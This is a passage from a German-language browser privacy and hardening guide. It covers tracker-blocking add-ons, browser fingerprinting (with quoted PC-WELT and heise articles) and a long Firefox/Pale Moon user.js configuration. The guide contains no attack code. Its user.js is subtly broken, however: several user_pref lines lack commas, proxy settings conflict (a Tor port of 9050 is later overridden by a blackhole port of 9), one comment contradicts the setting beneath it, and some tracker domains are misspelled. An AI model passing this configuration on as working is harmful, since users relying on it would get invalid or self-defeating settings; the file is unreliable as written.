noch, die Webseite noch einmal zu laden (refresh) und einstweilig wieder JavaScript über javascript.enabled false auszuschalten, bis man es wieder braucht.. Dasselbe kann man mit der Firefox-Erweiterung RequestPolicyBlockedContinued tun, hier mehr rein vorsichtshalber oder zusätzlich, da unbekannte Tracker hier bis zum Widerruf bereits von vornherein geblockt werden: Ins zuerst erscheinende Einstellungsfenster sind untereinander lauter Haken zu setzen, insgesamt drei, damit Regeln dauerhaft und nicht nur temporär hinzugefügt werden können. Im daraufhin erscheindenden Konfigurations-Fenster zur Formulierung und Verwaltung der einzelnen Filter-Regeln ist für die neue Regel "Blockieren" auswählen und in gleich alle Felder das Wildcard * (Stern) eintragen, anschließend neue Regel hinzufügen. Auf jeder Webseite sind die Selbstblockaden einer Webseite (bzw. entspr. Servers) in RequestPolicy beim kurzen Ansehen der Blockaden dann wieder zurückzusetzen. In unserem Bsp. erscheinen andernfalls die Bilder nicht mehr. In RequestPolicyBlockContinued bereits vorgegebene Regeln befinden sich übrigens einsichtbar in den json-Dateien allow_functionality.json, allow_sameorg.json usw weiter in einem tiefer gelegenen Unterverzeichnis von standard-profile unter /home/surfuser/.mozilla/firefox/default-profile. Sie lassen sich dort auf Wunsch bearbeiten. Forcierte SSL-Verschlüsselung (https:) kann mit noscript gesetzt werden: in Register "https", und zwar erneut mit * Das erspart die (ein wenig suspekte) Erweiterung HTTPS-everywhere. Die Ausnahmen von der Forcierung schreibe man in dem großen Eingabefeld untereinander. Neuere Versionen von Adblockplus verhindern das Einhalten dieser "Trusted-Strategie" "verboten ist, was nicht (ausdrücklich) erlaubt ist" durch Setzung des Sterns und Abspeicherung folgender Ausnahmen je nach individuellem Bedarf durch ihr neues Layout. Wir empfehlen für Firefox ESR 52.5.0 die von fr2.rpmfind.net erhätliche Pakete für AdblockPlus mit dem alten, Filtereinstellungen schnell per Mausklick ermöglichenden Layout sowie dazu erhätlichem Quellpaket: mozilla-adblockplus-2.9.1-27 (fc28, fc27, el7, el6). Noscript: mozilla-noscript (fc28, fc27, el7, el6) bzw. seamonkey-noscript (el6, ver. 5.9.1-3; enthält xpi-Installations-Datei, RequestPolicy: mozilla-requestpolicy (-1.0-0.22.20171019git633302 fc, el7, el6). Wir gehen also vor wie linfw3 und openssl bei ssl-Zertifikaten, d.h. auf der Basis von "trusted" (vertrauenswürdig). Die sicherheitstechnisch wichtige Firefox-Erweiterung RequestPolicyBlockedContinued zum Blocken eines aus der Webseite hervorgehenden Start-Ziel-Verkehrs enthält ggfls. ein paar vordefinierte Ausnahmeregeln. Neue Regeln lassen sich jedoch nicht jederzeit temporär sondern auch dauerhaft als User frei setzen. Unter Ports trage man hierzu einen Stern ein, der Eintrag selbst erfolgt möglicherweise nicht unter Start sondern nur unter Ziel. Generell (also unter Ziel ohne Start) empfiehlt sich ggfls. das Blocken extern gelandener Fonts (Schriftarten) und vieles von Google wie *fonts.googleapic.com*, *googleapis.com/*:*, *usercontent.*, *tagmanager.com/*:*/*, *google.*:*, *analytcis.*:*/* und *syndication.*:*/*. Rundum sicher wirds außerdem, wird Javascript in about:config mit Eintrag "javascript.enabled" auf false gesetzt. Kommt es zu unvollständigen Seitenaufbauten kann man ihn wieder auf true setzen. Die in Firefox und Pale Moon integrierten Suchmaschinen-Plugins bzw. searchplugins, bei Pale Moon aus /usr/lib64/palemoon/browser/searchplugins, können bis auf ein einziges gelöscht werden. Entfernt man davon alle, baut sich das Kontextmenü möglicherweise unvollständig auf, so dass z.B. Textausschnitte und Links aus Webseiten heraus nicht mehr kopiert werden.. In diesem übrig bleibenden xml-Suchplugin sollte der Suchparameter vorsichtshalber (mit nano oder einem anderen Texteditor) entfernt werden. Die Chronik bzw. History des Browsers sollte noch deaktiviert werden oder jedesmal nach dem Beenden gelöscht werden. Gegebenenfalls surfe man im privaten Modus. Zertifkate: Erlaubnisse lassen sich pro Seite durch Klick auf das Schloss-Symbol für die Verschlüsslerung und Auswahl des Registers Permission seitenweise von Webseite zu Webseite auf die Werte "default", "Always ask", "Allow" und "Block" setzen. Zu den Certificate-Permissions zählen: Access Your Location Intall Add-ons Load Images Maintain Offline Storage Open Pop-up Window Receive Notifications Set Cookies Share the Screen Use the Camera Use the Microphone Auch die Plugins bzw. Erweiterungen sollten nur bei Bedarf aktiviert werden. Austragen (fast) aller dem Browser (gilt auch für Pale Moon und Tor) und Erweiterungen bekannten URL und URI about:config -> Eingabe von http in die Adress-Suchzeile -> jeweiliges Austragen aufgelisteter URL bzw. URI durch Mausklick und Ersatz mit blank. Tracking: Woran Werbenetzwerke Sie erkennen, PC-WELT.de, 24.09.2016 Um einen Rechner und damit auch seinen Benutzer im Internet zu identifizieren, lässt sich nicht nur die IP-Adresse oder ein gespeichertes Cookie, sondern auch die Betriebssystem- und die Browserkonfiguration verwenden. Mit Informationen über die Art der installierten Plug-ins, die Zahl der eingerichteten Schriftarten, über Windows-Version, Monitorauflösung und mehr können Website-Betreiber ein Profil anlegen, das sich im Netz verfolgen lässt. Diese Methode wird Fingerprinting genannt, da die PC-Konfiguration wie ein Fingerabdruck zur Identifikation genutzt wird. Der Browser, ganz gleich, ob Internet Explorer, Chrome oder Firefox, gibt über diese Einstellungen bereitwillig Auskunft. Die Seite www.dein-ip-check.de zeigt Ihnen, welche Daten die Programme konkret übermitteln. Unter http://ip-check.info erhalten Sie zudem zahlreiche Informationen, welche Daten Sie zusätzlich im Netz identifizierbar machen.Das Fingerprinting wird gegenüber der Identifizierung per Cookies bei den Tracking-Firmen immer beliebter. Denn Cookies kann der Anwender löschen oder mit Tools wie Ghostery oder Privacy Badger zurückweisen. Der Fingerprint eines PCs lässt sich dagegen deutlich schwerer maskieren. Entsprechend wichtig ist es, einen Sicherheitsbrowser zu nutzen, der nicht nur gefährliche Websites blockieren kann, sondern auch Ihre Privatsphäre schützt. Mehr oder weniger gut gelingt das allen in diesem Beitrag vorgestellten Browsern. Am stärksten hat sich der Browser Dooble diese Art des Tracking-Schutzes auf die Fahne geschrieben. Letztlich ist jedoch ein gutes Cookie-Management deutlich wichtiger, da die allermeisten Werbenetzwerke und andere Tracker Sie hauptsächlich per Cookie verfolgen. übrigens: Die "Do not track"-Einstellung im Browser ist weitgehend nutzlos, da sich fast keine Website daran hält, http://www.pcwelt.de/ratgeber/Spezialbrowser-Anonym-sicher-surfen-10041652.html Hilfesucher2, #1, trojaner-board.de, 18.05.2018 Sporadische Webseiten-Weiterleitung auf irgendwelche Gewinn-Webseiten - Standard Problem: Sporadische Webseiten-Weiterleitung auf irgendwelche Gewinn-Webseiten Hallo, ich vermute, dass ich einen Trojaner oder irgendeine andere Malware auf meinem PC habe. Leider findet aber der ADW-Cleaner nichts. Google-Chrome ist mein Standardbrowser, und ich habe hier sehr viele Seiten immer geöffnet, wenn ich dann meine Tabs durchklicke stelle ich manchmal fest, dass manche Tabs nicht mehr die eigentliche Seite ist (z.Bsp. Ebay) sondern auf einmal eine komische Gewinn-Fake-Seite. Selbst per "Zurück" kommt man dann nicht mehr auf die ursprüngliche Seite zurück. Wie kann ich das loswerden? Ich hoffe, ihr könnt mir weiterhelfen. cosinus, #2 /// Winkelfunktion /// TB-Süch-Tiger™ Lesestoff: Google Chrome Offensichtlich nutzt du den Browser Chrome von Google. Von der Verwendung dieses Browsers muss man aus Datenschutzgründen dringend abraten. Siehe auch Google: Chrome-Browser scannt lokale Dateien auf Windows-PCs Installiere Mozilla Firefox, damit lassen sich auch Profildaten aus Chrome importieren, anschließend Google Chrome deinstallieren. https://www.trojaner-board.de/190446-sporadische-webseiten-weiterleitung-irgendwelche-gewinn-webseiten.html Livesysteme, PC-WELT.de, 24.09.2016 Den besten Schutz für Ihren PC erhalten Sie, wenn Sie für Ausflüge ins Internet ein Livesystem verwenden. Der Nachteil einer Live- DVD oder eines Live-USB-Sticks: Sie müssen den PC neu starten, was einige Zeit dauert. Doch wenn Sie einen Ausflug in die dunkleren und damit gefährlicheren Ecken des Internets machen müssen, ist ein Livesystem die beste Wahl. Ein Beispiel dafür ist das PC-WELT-Notfallsystem , das natürlich auch einen Browser zum Surfen im Internet bietet. Die höchsten Sicherheitsansprüche beim Surfen erfüllt das Linux-Livesystem Tails . Es bietet unter anderem den Sicherheitsbrowser Tor. Tails kommt mit einem Installationsassistenten für Windows, der das Livesystem auf einen USB-Stick bringt. Allerdings brauchen Sie zwei USB-Sticks mit je 4 GB Speicherplatz. Die zwei Sticks (nur) zur Installation sind nötig, da die komplette Tails-Installation nicht von Windows aus erfolgen kann, sondern vom ersten Stick aus geschieht, http://www.pcwelt.de/ratgeber/Spezialbrowser-Anonym-sicher-surfen-10041652.html Browser-Fingerprinting: GPU-Tracking möglich, trojaner-info.de, heise-online.de, 06.02.2022 Browser-Tracking für Webseiten-Betreiber maßgeblich vereinfacht - Leistungscharakteristika einer Grafikeinheit sehr individuell Auch ohne Tracking-Cookies können beim Browsen mittels Fingerprinting Computer, Notebooks, Smartphones sowie andere Geräte über längere Zeiträume identifiziert werden. Dass sich die Grafikeinheit in einem Gerät zur Nachverfolgung ausnutzen lässt, konnte ein Forschungsverbund aus australischen, israelischen und französischen Universitäten jetzt beweisen. Über die bei Browsern gängige Grafik-API WebGL lässt die DrawnApart genannte Technik (Paper) kurzweilige Grafikberechnungen laufen. Dabei protokolliert sie per JavaScript Parameter, einen Großteil der Anzahl der Shader-Kerne, die Taktfrequenz und die benötigte Zeit zum Rendern. Die Berechnungen können wahlweise entweder für wenige Sekunden im Vordergrund oder für einen längeren Zeitraum im Hintergrund laufen. Bisherige Identifizierungstechniken erweitert Eigentlich identische Hardware lässt sich theoretisch auseinanderhalten, da die Halbleiterbauelemente einzigartig sind. Jede GPU hat nämlich eine eigene Kurve aus Spannung und Takt. Das Forschungsteam machte sich diese Leistungscharakteristika zu Nutze, um bestehende Browser-Fingerprinting-Techniken auszubauen. Bisherige lesen Hardware-Konfigurationen, Browser-Versionen und -Einstellungen aus. Geräte lassen sich nach Software-Updates und umgesteckter Hardware mit den DrawnApart-Daten besser identifizieren, sofern dieselbe GPU zum Einsatz kommt. Über Monate wurde im Paper und dem Verbund mit DranwnApart einzeln wie gemeinsam auf mehr als 2.500 Geräten die Fingerabdruck-Technik FP Stalker getestet. Das Ergebnis: Die mittlere Tracking-Dauer stieg von 16 auf 30 Tage (+ 66,7 Prozent), wenn alle sechs Tage eine präparierte Webseite besucht wurde. Bei einem Intervall von sieben Tagen stieg die mittlere Tracking-Dauer von 17,5 auf 28 Tage (+ 60 Prozent). Weniger als die Hälfte der Browser-Instanzen ließen sich nach diesen Zeiträumen noch zuverlässig identifizieren. Unternehmen wie Apple, Microsoft, Google und Mozilla entwickeln aktuell den potenziellen WebGL-Nachfolger WebGU, der neben Grafik- auch komplexe Compute-Shader ausführen kann. Das Forschungsteam ließ Mutex-Funktionen auf allen Shader-Gruppen einer GPU laufen und protokollierte, welche Shader-Gruppe wie schnell die Aufgabe erledigte. Die Dauer zur Identifizierung von etwa acht Sekunden verkürzte sich auf 150 Millisekunden. Und das bei einer Klassifikationsgenauigkeit von 98 Prozent. So plädiert das Forschungsteam dafür, bei der Entwicklung neuer Browser-APIs das Thema Privatsphäre in den Fokus zu rücken. Quelle: heise online Redaktion https://www.trojaner-info.de/mobile-security/aktuell/browser-fingerprinting-gpu-tracking-moeglich.html Zu beachten ist noch unbedingt folgender Artikel zum Abstimmen von Firefox über "about::config" zum Firefox Tuning zur Absicherung und Anonymisierung, https://wiki.kairaven.de/open/app/firefox (!!!) und user.js http://kb.mozillazine.org/About:config_Entries Firefox configuration hardening A user.js configuration file for Pale Moon and Mozilla Firefox designed to harden browser settings and make it more secure. This is a default template with every possible hardening measure enforced. See the relaxed branch for a variant providing more usability Main goals Limit the possibilities to track the user through web analytics. Harden the browser against known data disclosure or code execution vulnerabilities. Limit the browser from storing anything even remotely sensitive persistently. Make sure the browser doesn´t reveal too much information to shoulder surfers. Harden the browser´s encryption (cipher suites, protocols, trusted CAs). Limit possibilities to uniquely identify the browser/device using browser fingerprinting. Hopefully limit the attack surface by disabling various features. Still be usable in daily use. How to achieve this? There are several parts to all this and they are: Downloading and installing the user.js file. Reading about and applying further hardening techniques. Optional: Modifying user.js to adapt it to your web browser usag /************ * /home/surfuser/.mozilla/firefox/your_default_profile_directory00-or-so/user.js * * https://github.com/pyllyukko/user.js * ****************************/ // http://kb.mozillazine.org/User.js_file //================== // section TOR-BROWSER (ff-ESR) only // ================= // The meek-http-helper extension uses dump to write its listening port number /// to stdout. // pale moon- and therefore.also ff- extension SecretAgent for setting and changing user agents user_pref("extensions.SecretAgent.StealthMode", true); // enable javascript, so that ABP (fc29) of ff will work, but disable it for Pale Moon because of ABL. ABL works even, if disabled. user_pref("javascript.enabled", true); // // disable ftp user_pref("network.protocol-handler.external.ftp" true); user_pref("browser.addon-watch.ignore", ""); // block images: 3: from third parties user_pref("permissions.default.image", 3); // Next one might block webbugs etc.: user_pref("security.xcto_nosniff_block_images", true); // // always enable mouseclick on links and formular text inputs: // (user_pref("network.protocol_handler.expose_all", true) // //Proxy: always use anonymizing Tor each ff-start user_pref("network.http.proxy.pipelining", false); // Settings won´ get stored, when using: user_pref("network.proxy.no_proxies_on", ""); user_pref("network.proxy.socks", "127.0.0.1"); user_pref("network.proxy.socks_port", 9050); user_pref("network.proxy.type", 1); // DNS for Tor: remote DNS lookup at first or local DNS lookup at first. We care especially for the case "false" in future in the excurs-section for DNS-Server user_pref("network.proxy.socks_remote_dns", false); // Erhöhung der Privatsphäre gegenüber Suchmaschinen: Wie bereits dargestellt übermittelt Firefox standardmäßig jeden einzelnen Buchstaben bzw. unsere Eingabe an eine // Suchmaschine, ohne dass wir die Suchabfrage überhaupt abgesendet haben. Diese "Komfortfunktion" wird über die user.js deaktiviert. Wer die Funktion beibehalten möchte, der kann optional // folgende drei Zeilen einfach entfernen: // ## Disable location bar LIVE search suggestions user_pref("browser.search.suggest.enabled", false); user_pref("browser.urlbar.suggest.searches", false); // some more settings // // Strenge Einstellungen: Die strenge user.js blockiert restriktiv vieles, was für Tracking sowie Sicherheit relevant sein könnte. Neben Trackinschutz sollen auch Möglichkeiten für Angriffe auf den Browser minimiert werden. // Diese Einstellungen sind für Risikogruppen geeignet, die für höhere Sicherheit einige Einschränkungen in Kauf nehmen. // Javascript Just-in-Time-Compiler sind aus Sicherheitsgründen deaktiviert, was die ausführung von Javascript auf einige Webseiten verlangsamt. // Anzeige von PDF Dokumenten im Browser ist deaktiviert. // SVG, Flash, WebGL und WebGL2 sind komplett deaktiviert. // Auto-Play und Hardware Video Decoding sind deaktiviert. // Closed Source Video Codecs werden nicht verwendet. // Favicons werden nicht geladen und nicht gespeichert. // Es werden keine Login Credentials gespeichert. // Unverschlüsseltes HTTP und FTP sind abgeschaltet, nur HTTPS möglich. // Push Services sind deaktiviert. // Der Download von externen Schriftarten ist auch für Symbole deaktiviert. Um die resultierenden Einschränkungen etwas abzumildern, kann man häufig genutzte Webicon Fonts wie den Awesome Webicon Font lokal // installieren. Linux Distributionen enthalten passende Pakete: // Ubuntu: > sudo apt install fonts-font-awesome // Fedora: > sudo dnf install fontawesome-fonts fontawesome-fonts-web // https://privacy-handbuch.de/handbuch_21u.htm# user_pref("network.cookie.lifetime.days", 1); user_pref("extensions.getAddons.cache.enabled", false); user_pref("dom.max_chrome_script_run_time", 10); user_pref("dom.max_script_run_time", 20); user_pref("privacy.trackingprotection.enabled", true); user_pref("privacy.trackingprotection.pbmode.enabled", true); user_pref("privacy.ui.enabled", true); // user_pref("noscript.preset", "medium"); user_pref("media.video-queue.default-size", 0); user_pref("status4evar.advanced.status.detectVideo", false); user_pref("devtools.cache.disabled", false); // must be set to false, true might cause screen-flickering! user_pref("devtools.browserconsole.filter.secerror", false); user_pref("devtools.command-button-frames.enabled", false); user_pref("devtools.command-button-responsive.enabled", false); user_pref("devtools.command-buttion-splitconsole.enabled", false); user_pref("media.gmp-manager.certs.2.commonName", ""); user_pref("media.gmp-manager.certs.1.commonName", ""); user_pref("gecko.handlerService.schemes.mailto.0.name", ""); user_pref("gecko.handlerService.schemes.mailto.1.name", ""); user_pref("general.useragent.compatMode.gecko", false); user_pref("general.useragent.compatMode", 0); user_pref("general.useragent.override.aol.com", ""); user_pref("general.useragent.override.netflximg.net", ""); user_pref("general.useragent.override.players.brightcove.net", ""); user_pref("general.useragent.override.deviantart.net", ""); user_pref("general.useragent.override.bing.com", ""); user_pref("general.useragent.override.calendar.yahoo.com", ""); user_pref("general.useragent.override.chase.com", ""); user_pref("general.useragent.override.citi.com", ""); user_pref("general.useragent.override.dailymotion.com", ""); user_pref("general.useragent.override.deviantart.com", ""); user_pref("general.useragent.override.dropbox.com", ""); user_pref("general.useragent.override.firefox.com", ""); user_pref("general.useragent.override.gaming.youtube.com", "" ); user_pref("general.useragent.override.github.com", ""); user_pref("general.useragent.override.google.com", ""); user_pref("general.useragent.override.googlevideos.com", ""); user_pref("general.useragent.override.gstatic.com", ""); user_pref("general.useragent.override.humblebundle.com", ""); user_pref("general.useragent.override.mozilla.com", ""); user_pref("general.useragent.override.msn.com", ""); user_pref("general.useragent.override.netflix.com", ""); user_pref("general.useragent.override.outlook.com", ""); user_pref("general.useragent.override.patientaccess.com", ""); user_pref("general.useragent.override.soundcloud.com", ""); user_pref("general.useragent.override.web.whatsapp.com", ""); user_pref("general.useragent.override.www.amazon.com", ""); user_pref("general.useragent.override.yahoo.com", ""); user_pref("general.useragent.override.yuku.com", ""); user_pref("general.useragent.override.addons.mozilla.org", ""); user_pref("general.useragent.override.altibox.dk", ""); user_pref("general.useragent.override.altibox.no", ""); user_pref("general.useragent.override.mozilla.org", ""); user_pref("general.useragent.override.netflximg.com", ""); user_pref("general.useragent.override.youtube.com", ""); user_pref("general.useragent.override.web.de", ""); user_pref("general.useragent.override.privat24.ua", ""); user_pref("general.useragent.override.players.brightcove", ""); user_pref("general.useragent.override.hitbox.tv", ""); user_pref("general.useragent.override.live.com", ""); user_pref("security.ssl.disable_session_identifiers", false); user_pref("devtools.remote.wifi.scan", false); user_pref("devtools.remote.wifi.visible", false); user_pref("devtools.gcli.imgurClientID", ""); user_pref("browser.dom.window.dump.enabled", true); // // Enable (here disable) SPDY and HTTP/2 as they are in Firefox 38, for a matching ALPN extension. // https://trac.torproject.org/projects/tor/ticket/15512 user_pref("network.http.spdy.enabled", false); user_pref("network.http.spdy.enabled.http2", false); user_pref("network.http.spdy.enabled.http2draft", false); user_pref("network.http.spdy.enabled.v3-1", false); user_pref("network.http.spdy.coalesce-hostnames", false); // Disable safe mode. In case of a crash, we Don´t want to prompt for a // safe-mode browser that has extensions disabled. // https://support.mozilla.org/en-US/questions/951221#answer-410562 user_pref("toolkit.startup.max_resumed_crashes", -1); //===================== // end section TOR-BROWSER //===================== // Set a failsafe blackhole proxy of 127.0.0.1:9, to prevent network interaction // in case the user manages to open this profile with a normal browser UI (i.e., // not headless with the meek-http-helper extension running). Port 9 is // "discard", so it should work as a blackhole whether the port is open or // closed. network.proxy.type=1 means "Manual proxy configuration". // http://kb.mozillazine.org/Network.proxy.type user_pref("network.proxy.type", 1); user_pref("network.proxy.socks", "127.0.0.1"); user_pref("network.proxy.socks_port", 9); // Make sure DNS is also blackholed. network.proxy.socks_remote_dns is // overridden by meek-http-helper at startup. user_pref("canvas.capturestream.enabled", false); user_pref("security.csp.experimentalEnabled", true); user_pref("privacy.firstparty.isolate", true); user_pref("privacy.popups.disable_from_plugins", 3); user_pref("privacy.permissionPrompts.showCloseButton", true); user_pref("privacy.popups.disable_from_plugins", 3); user_pref("privacy.resistFingerprinting", true); user_pref("security.data_uri.block_toplevel_data_uri_navigations", true); user_pref("security.family_safety.mode", 0); user_pref("social.directories", ""); user_pref("svg.disabled", true); user_pref("extensions.enabledAddons", "meek-http-helper@bamsoftware.com:1.0"); user_pref("network.protocol-handler.expose.ftp", false); user_pref("network.protocol-handler.external.ftp", false); user_pref("image. animation_mode" "normal"); user_pref("update. interval", 0); Determines when images should be loaded. 1 (default): Load all images 2: Do not load any images 3: Load images from same (originating) server only Note: This preference was previously known as user_pref("permissions.default.image", 1); // // PC-Welt.de, https://www.pcwelt.de/ratgeber/Geheime-Tricks-der-Insider-Browser-Geheimnisse-8809751.html // user_pref("Media.navigator.enabled", false); user_pref("Media.peerconnection.enabled", false); user_pref("Browser.taskbar.previews.enable", false); user_pref("Privacy.resistFingerprinting", true); // // // /******************** * SECTION: HTML5 / APIs / DOM * ********************/ // recommended for Firefox-ESR // listed settings contribute to anonymizing and increasing speed of firefox up to 100% // copy to /home/user/.mozilla/firefox/*your_profile_default_directory/ // PREF: Disable Service Workers // https://developer.mozilla.org/en-US/docs/Web/API/Worker // https://developer.mozilla.org/en-US/docs/Web/API/ServiceWorker_API // https://wiki.mozilla.org/Firefox/Push_Notifications#Service_Workers // NOTICE: Disabling ServiceWorkers breaks functionality on some sites (Google Street View...) // Unknown security implications // CVE-2016-5259, CVE-2016-2812, CVE-2016-1949, CVE-2016-5287 (fixed) user_pref("dom.serviceWorkers.enabled", false); // PREF: Disable Web Workers // https://developer.mozilla.org/en-US/docs/Web/API/Web_Workers_API/Using_web_workers // https://www.w3schools.com/html/html5_webworkers.asp // NOTICE: Disabling Web Workers breaks "Download as ZIP" functionality on https://mega.nz/, WhatsApp Web and probably others user_pref("dom.workers.enabled", false); user_pref("browser.tabs.closeWindowWithLastTab", false); // from https://www.instructables.com/id/Improve-ADSL-Broadband-Performance/ user_pref("browser.link.open_newwindow.restriction", 1); user_pref("webgl.enable-webgl2", false); user_pref("webgl.disable-wgl", true); user_pref("browser.sessionhistory.max_entries", 3); user_pref("media.navigator.video.preferred_codec", 126); user_pref("media.navigator.video.max_fs", 2560); user_pref("media.navigator.video.h264.level", 22); user_pref("media.navigator.video.h264.max_mbps", 6000); user_pref("media.ffmpeg.low-latency.enabled", true); // Reduce CPU Utilization // this few settings can reduce the cpu utilization and speeding up web contents. user_pref("layout.frame_rate", 20); user_pref("gfx.direct2d.disabled", false); user_pref("gfx.direct2d.force-enabled", true); user_pref("layers.prefer-opengl", true); // PREF: Disable web notifications // https://support.mozilla.org/t5/Firefox/I-can-t-find-Firefox-menu-I-m-trying-to-opt-out-of-Web-Push-and/m-p/1317495#M1006501 user_pref("dom.webnotifications.enabled", false); // PREF: Disable DOM timing API // https://wiki.mozilla.org/Security/Reviews/Firefox/NavigationTimingAPI // https://www.w3.org/TR/navigation-timing/#privacy user_pref("dom.enable_performance", false); // PREF: Make sure the User Timing API does not provide a new high resolution timestamp // https://trac.torproject.org/projects/tor/ticket/16336 // https://www.w3.org/TR/2013/REC-user-timing-20131212/#privacy-security user_pref("dom.enable_user_timing", false); // PREF: Disable Web Audio API // https://bugzilla.mozilla.org/show_bug.cgi?id=1288359 user_pref("dom.webaudio.enabled", false); // PREF: Disable Location-Aware Browsing (geolocation) // https://www.mozilla.org/en-US/firefox/geolocation/ user_pref("geo.enabled", false); // PREF: When geolocation is enabled, use Mozilla geolocation service instead of Google // https://bugzilla.mozilla.org/show_bug.cgi?id=689252 user_pref("geo.wifi.uri", "https://location.services.mozilla.com/v1/geolocate?key=%MOZILLA_API_KEY%"); // PREF: When geolocation is enabled, don´t log geolocation requests to the console user_pref("geo.wifi.logging.enabled", false); // PREF: Disable raw TCP socket support (mozTCPSocket) // https://trac.torproject.org/projects/tor/ticket/18863 // https://www.mozilla.org/en-US/security/advisories/mfsa2015-97/ // https://developer.mozilla.org/docs/Mozilla/B2G_OS/API/TCPSocket user_pref("dom.mozTCPSocket.enabled", false); // PREF: Disable DOM storage (disabled) // http://kb.mozillazine.org/Dom.storage.enabled // https://html.spec.whatwg.org/multipage/webstorage.html // NOTICE-DISABLED: Disabling DOM storage is known to cause´TypeError: localStorage is null´ errors user_pref("dom.storage.enabled", false); // PREF: Disable leaking network/browser connection information via Javascript // Network Information API provides general information about the system´s connection type (WiFi, cellular, etc.) // https://developer.mozilla.org/en-US/docs/Web/API/Network_Information_API // https://wicg.github.io/netinfo/#privacy-considerations // https://bugzilla.mozilla.org/show_bug.cgi?id=960426 user_pref("dom.netinfo.enabled", false); // PREF: Disable network API (Firefox< 32) // https://developer.mozilla.org/en-US/docs/Web/API/Connection/onchange // https://www.torproject.org/projects/torbrowser/design/#fingerprinting-defenses user_pref("dom.network.enabled", false); // user_pref("network.dns.disableIPv6", true); // // PREF: Disable WebRTC entirely to prevent leaking internal IP addresses (Firefox< 42) // NOTICE: Disabling WebRTC breaks peer-to-peer file sharing tools (reep.io ...) user_pref("media.peerconnection.enabled", false); // PREF: Don´t reveal your internal IP when WebRTC is enabled (Firefox>= 42) // https://wiki.mozilla.org/Media/WebRTC/Privacy // https://github.com/beefproject/beef/wiki/Module%3A-Get-Internal-IP-WebRTC user_pref("media.peerconnection.ice.default_address_only", true); // Firefox 42-51 user_pref("media.peerconnection.ice.no_host", true); // Firefox>= 52 // PREF: Disable WebRTC getUserMedia, screen sharing, audio capture, video capture // https://wiki.mozilla.org/Media/getUserMedia // https://blog.mozilla.org/futurereleases/2013/01/12/ capture-local-camera-and-microphone-streams-with-getusermedia-now-enabled-in-firefox/ // https://developer.mozilla.org/en-US/docs/Web/API/Navigator user_pref("media.navigator.enabled", false); user_pref("media.navigator.video.enabled", false); user_pref("media.getusermedia.screensharing.enabled", false); user_pref("media.getusermedia.audiocapture.enabled", false); // PREF: Disable battery API (Firefox< 52) // https://developer.mozilla.org/en-US/docs/Web/API/BatteryManager // https://bugzilla.mozilla.org/show_bug.cgi?id=1313580 user_pref("dom.battery.enabled", false); // PREF: Disable telephony API // https://wiki.mozilla.org/WebAPI/Security/WebTelephony user_pref("dom.telephony.enabled", false); // PREF: Disable "beacon" asynchronous HTTP transfers (used for analytics) // https://developer.mozilla.org/en-US/docs/Web/API/navigator.sendBeacon user_pref("beacon.enabled", false); // PREF: Disable clipboard event detection (onCut/onCopy/onPaste) via Javascript // NOTICE: Disabling clipboard events breaks Ctrl+C/X/V copy/cut/paste functionaility in JS-based web applications (Google Docs...) // https://developer.mozilla.org/en-US/docs/Mozilla/Preferences/Preference_reference/dom.event.clipboardevents.enabled user_pref("dom.event.clipboardevents.enabled", false); // PREF: Disable "copy to clipboard" functionality via Javascript (Firefox>= 41) // NOTICE: Disabling clipboard operations will break legitimate JS-based "copy to clipboard" functionality // https://hg.mozilla.org/mozilla-central/rev/2f9f8ea4b9c3 user_pref("dom.allow_cut_copy", false); // PREF: Disable speech recognition // https://dvcs.w3.org/hg/speech-api/raw-file/tip/speechapi.html // https://developer.mozilla.org/en-US/docs/Web/API/SpeechRecognition // https://wiki.mozilla.org/HTML5_Speech_API user_pref("media.webspeech.recognition.enable", false); // PREF: Disable speech synthesis // https://developer.mozilla.org/en-US/docs/Web/API/SpeechSynthesis user_pref("media.webspeech.synth.enabled", false); // PREF: Disable sensor API // https://wiki.mozilla.org/Sensor_API user_pref("device.sensors.enabled", false); // PREF: Disable pinging URIs specified in HTML<a> ping= attributes // http://kb.mozillazine.org/Browser.send_pings user_pref("browser.send_pings", false); // PREF: When browser pings are enabled, only allow pinging the same host as the origin page // http://kb.mozillazine.org/Browser.send_pings.require_same_host user_pref("browser.send_pings.require_same_host", true); // PREF: Disable IndexedDB (disabled) // https://developer.mozilla.org/en-US/docs/IndexedDB // https://en.wikipedia.org/wiki/Indexed_Database_API // https://wiki.mozilla.org/Security/Reviews/Firefox4/IndexedDB_Security_Review // http://forums.mozillazine.org/viewtopic.php?p=13842047 // https://github.com/pyllyukko/user.js/issues/8 // NOTICE-DISABLED: IndexedDB could be used for tracking purposes, but is required for some add-ons to work (notably uBlock), so is left enabled user_pref("dom.indexedDB.enabled", false); // TODO: "Access Your Location" "Maintain Offline Storage" "Show Notifications" // PREF: Disable gamepad API to prevent USB device enumeration // https://www.w3.org/TR/gamepad/ // https://trac.torproject.org/projects/tor/ticket/13023 user_pref("dom.gamepad.enabled", false); // PREF: Disable virtual reality devices APIs // https://developer.mozilla.org/en-US/Firefox/Releases/36#Interfaces.2FAPIs.2FDOM // https://developer.mozilla.org/en-US/docs/Web/API/WebVR_API user_pref("dom.vr.enabled", false); // PREF: Disable vibrator API user_pref("dom.vibrator.enabled", false); // PREF: Disable resource timing API // https://www.w3.org/TR/resource-timing/#privacy-security user_pref("dom.enable_resource_timing", false); // PREF: Disable Archive API (Firefox< 54) // https://wiki.mozilla.org/WebAPI/ArchiveAPI // https://bugzilla.mozilla.org/show_bug.cgi?id=1342361 user_pref("dom.archivereader.enabled", false); // PREF: Disable webGL // https://en.wikipedia.org/wiki/WebGL // https://www.contextis.com/resources/blog/webgl-new-dimension-browser-exploitation/ user_pref("webgl.disabled", true); // PREF: When webGL is enabled, use the minimum capability mode user_pref("webgl.min_capability_mode", true); // PREF: When webGL is enabled, disable webGL extensions // https://developer.mozilla.org/en-US/docs/Web/API/WebGL_API#WebGL_debugging_and_testing user_pref("webgl.disable-extensions", true); // PREF: When webGL is enabled, force enabling it even when layer acceleration is not supported // https://trac.torproject.org/projects/tor/ticket/18603 user_pref("webgl.disable-fail-if-major-performance-caveat", true); // PREF: When webGL is enabled, do not expose information about the graphics driver // https://bugzilla.mozilla.org/show_bug.cgi?id=1171228 // https://developer.mozilla.org/en-US/docs/Web/API/WEBGL_debug_renderer_info user_pref("webgl.enable-debug-renderer-info", false); // somewhat related... user_pref("pdfjs.enableWebGL", false); // PREF: Spoof dual-core CPU // https://trac.torproject.org/projects/tor/ticket/21675 // https://bugzilla.mozilla.org/show_bug.cgi?id=1360039 user_pref("dom.maxHardwareConcurrency", 2); /********************** * SECTION: Misc * **********************/ // PREF: Disable face detection user_pref("camera.control.face_detection.enabled", false); // ALWAYS SET A SEARCH ENGINE, OTHERWISE CONTEXT MENU BRAKES! (!!!) // // 